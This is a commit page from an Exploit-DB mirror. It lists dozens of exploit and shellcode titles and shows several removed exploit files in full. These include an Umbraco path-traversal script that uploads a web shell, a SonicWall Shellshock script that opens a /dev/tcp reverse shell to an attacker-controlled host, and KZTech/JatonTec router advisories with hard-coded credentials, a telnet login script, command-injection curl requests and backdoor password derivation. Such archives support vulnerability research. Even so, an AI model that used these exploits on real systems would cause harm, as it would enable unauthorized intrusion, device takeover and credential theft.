bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-12

Browse source 
176 changes to exploits/shellcodes

Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)

Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)

jQuery UI 1.12.1 - Denial of Service (DoS)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
ProFTPD 1.3.7a - Remote Denial of Service
glFTPd 2.11a - Remote Denial of Service
Hasura GraphQL 1.3.3 - Denial of Service
WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Telegram Desktop 2.9.2 - Denial of Service (PoC)
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)

Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free

MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)

Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
vsftpd 3.0.3 - Remote Denial of Service

GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)

PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting

Arteco Web Client DVR/NVR - 'SessionId' Brute Force

Resumes Management and Job Application Website 1.0 - Multiple Stored XSS

Library System 1.0 - Authentication Bypass Via SQL Injection

MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF

SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)

Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting

Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting

Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution

MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS

rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)

Mini Mouse 9.3.0 - Local File inclusion / Path Traversal

GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE

Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass

rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)

GravCMS 1.10.7 - Unauthenticated Arbitrary YAML Write/Update (Metasploit)

GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE

Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)

Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution

Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)

OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass

VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)

Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)

Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)

Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)

WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)

KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass

Event Registration System with QR Code 1.0 - Authentication Bypass & RCE

CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)

Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF

ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments

WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR

GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE

Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)

Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)

Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)

OpenSIS 8.0 'modname' - Directory/Path Traversal

Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS

Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)

Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation

PlaceOS 1.2109.1 - Open Redirection

Blood Bank System 1.0 - SQL Injection / Authentication Bypass

Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass

Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read

Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)
Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)
Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)

Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
This commit is contained in:
Offensive Security 2021-10-12 05:02:16 +00:00
parent caf7ab9c86
commit a250e82458
90 changed files with 0 additions and 8231 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

72
exploits/aspx/webapps/50241.py
View file

@ -1,72 +0,0 @@
# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1
# CVE : CVE-2020-5811
import string
import random
import argparse
import zipfile
import os
package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
<files>
<file>
<guid>{{filename}}</guid>
<orgPath>{{upload_path}}</orgPath>
<orgName>{{filename}}</orgName>
</file>
</files>
<info>
<package>
<name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
<version>1.0.0</version>
<iconUrl></iconUrl>
<license url="http://opensource.org/licenses/MIT">MIT License</license>
<url>https://example.com</url>
<requirements>
<major>0</major>
<minor>0</minor>
<patch>0</patch>
</requirements>
</package>
<author>
<name>CVE-2020-5811</name>
<website>https://example.com</website>
</author>
<contributors>
<contributor></contributor>
</contributors>
<readme><![CDATA[]]></readme>
</info>
<DocumentTypes />
<Templates />
<Stylesheets />
<Macros />
<DictionaryItems />
<Languages />
<DataTypes />
<Actions />
</umbPackage>
"""
parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()
if not os.path.isfile(args.shell):
print("[ERROR] please use a correct path for the shell file.")
output_file = "exploit.zip"
package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()
print(f"[DONE] Created Umbraco package: {output_file}")

68
exploits/hardware/dos/49685.txt
View file

@ -1,68 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to restart the
device with an HTTP GET request to /goform/RestartDevice page.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$

92
exploits/hardware/remote/49682.txt
View file

@ -1,92 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials are never exposed to
the end-user and cannot be changed through any normal operation of
the router.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5637
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
03.02.2021
--
Default web creds:
------------------
admin:admin123
user:user123
Telnet/SSH access:
------------------
admin:root123
===
import telnetlib
host="192.168.1.1"
user="admin"
password="root123"
s=telnetlib.Telnet(host)
s.read_until(b"CPE login: ")
s.write(user.encode('ascii') + b"\n")
s.read_until(b"Password: ")
s.write(password.encode('ascii') + b"\n")
s.write(b"busybox\n")
print(s.read_all().decode('ascii'))
s.mt_interact()
s.close()

82
exploits/hardware/remote/49695.txt
View file

@ -1,82 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device generates its SSID and password based on the
WAN MAC address.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5638
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php
03.02.2021
--
Example defaults:
# ifconfig |grep HWaddr
br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01
ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C
rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C
SSID1=MyWiFi-167C5D
SSID1=MyWiFi-5G-167C5D
WiFi password = EF167C5D

105
exploits/hardware/webapps/49499.py
View file

@ -1,105 +0,0 @@
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time
def banner():
print """
88 88
"" 88
88
8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88
`8b d8' 88 I8[ "" 88 88 "" `Y8 88
`8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88
`8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88
"8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88
88
88
88
,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba,
a8" `Y88 a8" "8a a8" "8a 88P' "Y8
8b 88 8b d8 8b d8 88
"8a, ,d88 "8a, ,a8" "8a, ,a8" 88
`"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021). Author: Darren Martyn. Credit
goes to Phineas Fisher for this. Stay inside, do crimes.
"""
def handler(lp): # handler borrowed from Stephen Seeley.
print "(+) starting handler on port %d" %(lp)
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" %(addr[0])
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def execute_command(target, command):
url = target + "/cgi-bin/jarrewrite.sh"
headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
r = requests.get(url=url, headers=headers, verify=False)
return r.text
def check_exploitable(target):
print "(+) Testing %s for pwnability..." %(target)
output = execute_command(target=target, command="cat /etc/passwd")
if "root:" in output:
print "(*) We can continue, time to wreck this shit."
return True
else:
return False
def pop_reverse_shell(target, cb_host, cb_port):
print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
execute_command(target=target, command=backconnect)
def hack_the_planet(target, cb_host, cb_port):
if check_exploitable(target) == True:
pass
else:
sys.exit("(-) Target not exploitable...")
handlerthr = Thread(target=handler, args=(int(cb_port),))
handlerthr.start()
pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
def main(args):
banner()
if len(args) != 4:
sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
if __name__ == "__main__":
main(args=sys.argv)

83
exploits/hardware/webapps/49680.txt
View file

@ -1,83 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authenticated OS command
injection vulnerability. This can be exploited to inject and
execute arbitrary shell commands through the 'pingAddr' HTTP
POST parameter bypassing the injection protection filter.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5635
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
03.02.2021
--
#JT3300V/AM3300V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: kz_userid=admin:311139" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$
#JT3500V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$

89
exploits/hardware/webapps/49681.txt
View file

@ -1,89 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authentication bypass
vulnerability. An unauthenticated attacker can disclose sensitive
and clear-text information resulting in authentication bypass by
downloading the configuration of the device and revealing the
admin password.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5636
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
03.02.2021
--
$ curl -s \
-o configtest.zlib \ # Default: config.dat
'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
binwalk -e configtest.zlib ; \
cd _configtest.zlib_extracted ; \
strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
# cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
cd ..
3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

124
exploits/hardware/webapps/49683.txt
View file

@ -1,124 +0,0 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device has several backdoors and hidden pages that
allow remote code execution, overwriting of the bootrom and
enabling debug mode.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
03.02.2021
--
Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.
Old models (syscmd.asp) password: super1234
Newer models (syscmd.html) password: md5(WAN_MAC+version):
$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
if (*pcVar6 == 0) {
pcVar6 = "6C:AD:EF:00:00:01";
}
memset(acStack280,0,0x100);
sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
...
psMd5Init(auStack112);
psMd5Update(auStack112,local_10,local_c);
psMd5Final(auStack112,uParm1);
